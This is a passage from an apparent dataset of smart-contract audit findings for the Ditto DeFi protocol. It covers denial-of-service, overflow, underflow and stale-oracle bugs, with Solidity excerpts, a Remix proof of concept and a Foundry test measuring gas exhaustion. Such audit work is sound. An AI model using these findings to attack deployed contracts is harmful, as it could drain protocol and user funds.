s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a big shortHintArray with wrong hints the gas costs will drastically increase to a point which drains the funds of the TAPP.",Check the length of the shortHintArray.,"As the TAPP does no longer has enough funds to pay for liquidation, if shortRecords are under collateralized. A lot of problems like the increment of the ercDebtRate and the shutdown of the market can occur. This leads to a big loss of user funds.","```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n" +The protocol allows less flags to be generated than possible which could lead to a DoS of the primary liquidation process,low,"The maximum flags (for liquidation) that can exist at the same time should be limited by the maximum number, of flaggerIdCounter which is a uint24, but it is limited by the maximum number of a uint16 instead. Therefore, a maximum of 65535 shortRecords can be flagged for liquidation at the same time. 
This is far too few if the protocol is used a lot and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter and therefore the maximum of flags that can exist at the same time is limited by the maximum number of a uint24:\\n```\\n
It also allows user to cancel one order.\\nIt makes sure that there are more than 65,000 orders.\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that DAO can't cancel more than 1,000 orders.\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\nLater `cancelOrderFarFromOracle` checks if `msg.sender == LibDiamond.diamondStorage().contractOwner` and based on the boolean value (true or false) of this statement it allows to cancel the desired amount of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol) which is called on the mapping of orders of specified earlier `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n \\n```\\n\\nThis function receives parameters:\\nmapping of orders to cancel\\naddress of asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nWhen we look at the implementation of this function we can see that `uint8` was used as a variable for the iteration in the `for loop`. `uint8` i maximum value is `255`. 
As we can see in the `for loop` there is `unchecked` statement which allows uint underflow / overflow.\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nSo when we try to add 1 to 255 (255 + 1) solidity would automaticly `revert` due to uint overflow but when we use `unchecked` solidity allows us to do this operation and the result of this will be `0`.\\nWhen DAO would like to cancel more than 255 orders it would result in infinite loop since:\\nthe for loop will iterate when `i` < numOrdersToCancel\\nthe vaule of `i` will always be less than 256 because it can't get bigger than that due to overflow\\n`i = 255` and `i < 256` `unchecked {++i;}` Next iteration `i = 0` and `i < 256` `unchecked {++i;}`\\nI created pretty simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 orders cancelations run this function with input parameter (amountOfItertions) equal to 256 or above.\\nFurther explenation\\nAfter DAO tries to cancel more than 255 orders the infinite loop will be created which will terminate the transaction.\\nThe transaction will fail because of gas consumption. For loop will run as many times as it can with provided gas. Since it will try to run infinitely it will run out of gas.",To solve this problem change `uint8 i` to `uint16` or any higher uint that can handle the desired amount of iterations.,"Protocol documentation states that DAO is able to cancel 1,000 orders. Since it is not possible with the current implementation of the code this issue disrupts protocols functionality. 
The implemented code can't handle desired functionality.\\nTools used\\nVScode, Manual Review, Remix",```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n +Order creation can run out of gas since relying on previous order matchtype,medium,"If the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. 
This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.",I think the probability of the above scenario is higher than that of multiple user's cancelling their orders. 
Hence moving to the next hint order as soon as the current hint order has been found to be reused could be better and will cost less gas on error.,"Order creation can run out-of-gas on particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/test/AskSellOrders.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/AskSellOrders.t.sol\\n@@ // Remove the line below\\n8,7 // Add the line below\\n8,7 @@ import {Errors} from ""contracts/libraries/Errors.sol"";\\n import {STypes, MTypes, O} from ""contracts/libraries/DataTypes.sol"";\\n \\n import {OBFixture} from ""test/utils/OBFixture.sol"";\\n// Remove the line below\\n// import {console} from ""contracts/libraries/console.sol"";\\n// Add the line below\\nimport {console} from ""contracts/libraries/console.sol"";\\n \\n contract SellOrdersTest is OBFixture {\\n using U256 for uint256;\\n@@ // Remove the line below\\n59,6 // Add the line below\\n59,49 @@ contract SellOrdersTest is OBFixture {\\n assertEq(asks[0].price, DEFAULT_PRICE);\\n }\\n \\n// Add the line below\\n function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n// Add the line below\\n for (uint256 i = 0; i < 1000; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // a new order at the bottom of the order book\\n// Add the line below\\n fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n// Add the line below\\n assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n// Add the line 
below\\n\\n// Add the line below\\n // user wants to create an order at HIGHER_PRICE\\n// Add the line below\\n MTypes.OrderHint[] memory orderHintArray =\\n// Add the line below\\n diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n// Add the line below\\n uint16 targetOrderId = orderHintArray[0].hintId;\\n// Add the line below\\n assertTrue(targetOrderId == getAsks()[1000].id);\\n// Add the line below\\n\\n// Add the line below\\n // the target order gets cancelled\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n cancelAsk(targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a person creates a limit ask which reuses the cancelled order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a bid matches the targetId\\n// Add the line below\\n fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n // another person creates a limit ask which reuses the matched order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // the tx of the user goes through\\n// Add the line below\\n depositUsd(sender, DEFAULT_AMOUNT);\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n uint256 gasStart = gasleft();\\n// Add the line below\\n diamond.createAsk(\\n// Add the line below\\n asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n// Add the line below\\n );\\n// Add the line below\\n uint256 gasUsed = gasStart // Remove the line below\\n gasleft();\\n// Add the line below\\n assertGt(gasUsed, 2_000_000);\\n// Add the line below\\n console.log(gasUsed);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function 
testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\n","```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n" +Secondary short liquidation reverts due to arithmetic underflow in volatile market conditions,medium,"The `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. 
This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. 
It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. 
This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidateable short position (simplified, ignores decimal precision for this demonstration):\\nCollateral Debt Collateralization Ratio (based on spot price) Price ETH/USD Spot Price TOKEN/ETH Cached Price TOKEN/ETH\\n1 ETH 1400 TOKEN $${1 \\over {1400 * 0.0005}} \\approx 142\\%$$ 2000 0.0005 0.00075\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\ &= 1400 \\cdot 0.00075 \\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per TOKEN\\n~15min after the price got updated and cached, the TOKEN/ETH spot price decreases from $0.00075 \\text{ ETH}$ to $0.0005 \\text{ ETH}$. 
The CR improves -> CR = $1/(1400 * 0.0005) \\approx 142\\%$\\nSecondary liquidation is attempted to liquidate the short (primary short liquidation is not possible due to the 110% CR limit)\\nDuring the secondary liquidation call, `m.cRatio` is calculated based on the recent spot price (in step 4, due to cached price older than 15min) of $0.0005 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.0005 = 0.7 \\text{ ETH}$ -> CR = $ 1 / 0.7 \\approx 142\\%$\\nIn line 168, `ercDebtAtOraclePrice` is calculated based on the previously cached oracle price of $0.00075 \\text{ ETH}$ -> $1400 * 0.00075 = 1.05 \\text{ ETH}$\\nIn line 176, `m.short.collateral` is subtracted by `ercDebtAtOraclePrice` -> $1 - 1.05= -0.05 \\text{ ETH}$ -> arithmetic underflow error -> reverts!","Consider also using the minimum of the `m.short.collateral` and `ercDebtAtOraclePrice` values, as similarly done in lines 204-205.","The secondary short liquidation mechanism reverts in certain market situations, forcing liquidators to wait for the CR to decrease further to be able to use the primary liquidation mechanism. This puts the overall collateral ratio and, thus the asset peg under pressure as liquidations can not be executed in a timely manner.",```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n +Lack of essential stale check in oracleCircuitBreaker(),medium,"The `LibOracle::oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"". 
Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nThis report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"" when compared to the `baseOracleCircuitBreaker()`.\\nWithout the check of the condition: ""block.timestamp > 2 hours + baseTimeStamp"", the `oracleCircuitBreaker()` will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nFor this reason, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale.\\n```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: ""block.timestamp > 2 hours + baseTimeStamp""\\n\\n if (invalidFetchData) revert 
Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n\\nThe oracleCircuitBreaker() lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"": https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L120-L123\\nWhereas the baseOracleCircuitBreaker() checks that condition: https://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L73","Add the condition: ""block.timestamp > 2 hours + baseTimeStamp"" in the `oracleCircuitBreaker()` to provide the stale check.\\n```\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n// Remove the line below\\n || baseChainlinkPrice <= 0;\\n// Add the line below\\n || baseChainlinkPrice <= 0 || block.timestamp > 2 hours // Add the line below\\n baseTimeStamp;\\n\\n if 
(invalidFetchData) revert Errors.InvalidPrice();\\n }\\n```\\n","This report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the `oracleCircuitBreaker()` only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues.\\nThe `oracleCircuitBreaker()` lacks checking the condition: ""block.timestamp > 2 hours + baseTimeStamp"". Hence, the function will not be able to verify whether or not the `baseChainlinkPrice` is stale (2-hour stale heartbeat).\\nConsequently, the `oracleCircuitBreaker()` will not revert the transaction as expected if the `baseChainlinkPrice` is stale. The stale price will be consumed by core functions of the protocol, leading to harming the funds of the protocol and its users.","```\\n //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n function oracleCircuitBreaker(\\n uint80 roundId,\\n uint80 baseRoundId,\\n int256 chainlinkPrice,\\n int256 baseChainlinkPrice,\\n uint256 timeStamp,\\n uint256 baseTimeStamp\\n ) private view { //@audit -- this report raises an issue regarding the lack of stale price check for the base oracle (ETH/USD price) in the oracleCircuitBreaker() only, as the 2-hour stale check and the lack of stale price check for the non-USD asset oracle were flagged as known issues\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0 || baseRoundId == 0\\n || baseTimeStamp == 0 || baseTimeStamp > block.timestamp\\n || baseChainlinkPrice <= 0; //@audit -- lack the condition: ""block.timestamp > 2 hours + baseTimeStamp""\\n\\n if (invalidFetchData) revert Errors.InvalidPrice();\\n }\\n\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n 
uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp; //@audit -- the baseOracleCircuitBreaker() checks this condition, but the oracleCircuitBreaker() does not check it (for the base oracle (ETH/USD price) only)\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n // rest of code\\n }\\n```\\n" +"LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation",low,"As per the documentation, LibOracle should only be returning the TWAP price from the WETH/USDC pool if the amount of WETH in the pool is >= 100e18. This is to ensure the fidelity of the data, which reduces the risk of price manipulation. However, this is not properly implemented for the case in which there was an invalid fetch of chainlink data. In this case, LibOracle simply returns the TWAP price without checking if there's enough liquidity in the pool. 
This can lead to a lack of data fidelity for the returned price.\\nIt's clear that reverting should be the correct action rather than returning the TWAP price without checking the liquidity, as even when there is a valid chainlink price, if the TWAP price is closer to the cached price (and there isn't enough liquidity), it will still revert.\\nLibOracle has a `baseOracleCircuitBreaker` function which handles whether to return the TWAP price or the chainlink price, when the asset is USD, and it is defined as follows:\\n```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n\\nWhen `invalidFetchData` is true, meaning that the chainlink price was not properly fetched, it will always return `twapPriceInv`. 
However, this lacks any checks as to whether there is at least 100 WETH in the Uniswap pool, which can result in a lack of data fidelity.","LibOracle fails to check the fidelity of price data from WETH/USDC pool, which can lead to price manipulation\\nBefore returning the TWAP price when `invalidFetchData` is true, first check whether the WETH/USDC pool has enough liquidity.","When the chainlink oracle is not functioning correctly, LibOracle will always return the TWAP price for the USD asset. However, this lacks any check as to whether there is enough liquidity in the Uniswap pool to guarantee data fidelity, meaning there is a higher likelihood of price manipulation.","```\\nfunction baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n // rest of code\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n }\\n\\n if (invalidFetchData) {\\n return twapPriceInv; // @issue\\n } else {\\n // rest of code\\n }\\n } else {\\n return chainlinkPriceInEth;\\n }\\n}\\n```\\n" +Decreasing and increasing a short's collateral potentially uses an outdated asset price to calculate the collateral ratio,medium,"The `decreaseCollateral` and `increaseCollateral` functions in the `ShortRecordFacet` contract calculate the short's collateral ratio based on the cached asset price, which may be outdated, leading to a divergence between the actual collateral ratio 
(based on the asset spot price) and the calculated collateral ratio.\\nAccording to the conditions for updating the oracle, decreasing the short's collateral via the `ShortRecordFacet.decreaseCollateral` function should update the oracle price if the oracle price is older than 15 minutes.\\nHowever, in the current implementation of the `decreaseCollateral` function, the short's collateral ratio, `cRatio`, is calculated by calling the `getCollateralRatio` function in line 94:\\n```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n\\nThe called `getCollateralRatio` function uses the `LibOracle.getPrice` function to calculate the collateral ratio:\\n```\\nfunction getCollateralRatio(STypes.ShortRecord memory short, address asset)\\n internal\\n view\\n returns (uint256 cRatio)\\n{\\n return short.collateral.div(short.ercDebt.mul(LibOracle.getPrice(asset)));\\n}\\n```\\n\\nThe `LibOracle.getPrice` function returns the currently cached asset price, which potentially is older than 15 minutes.\\n```\\nfunction getPrice(address asset) internal view returns (uint80 oraclePrice) {\\n AppStorage storage s = appStorage();\\n return uint80(s.bids[asset][Constants.HEAD].ercAmount);\\n}\\n```\\n\\nConsequently, the 
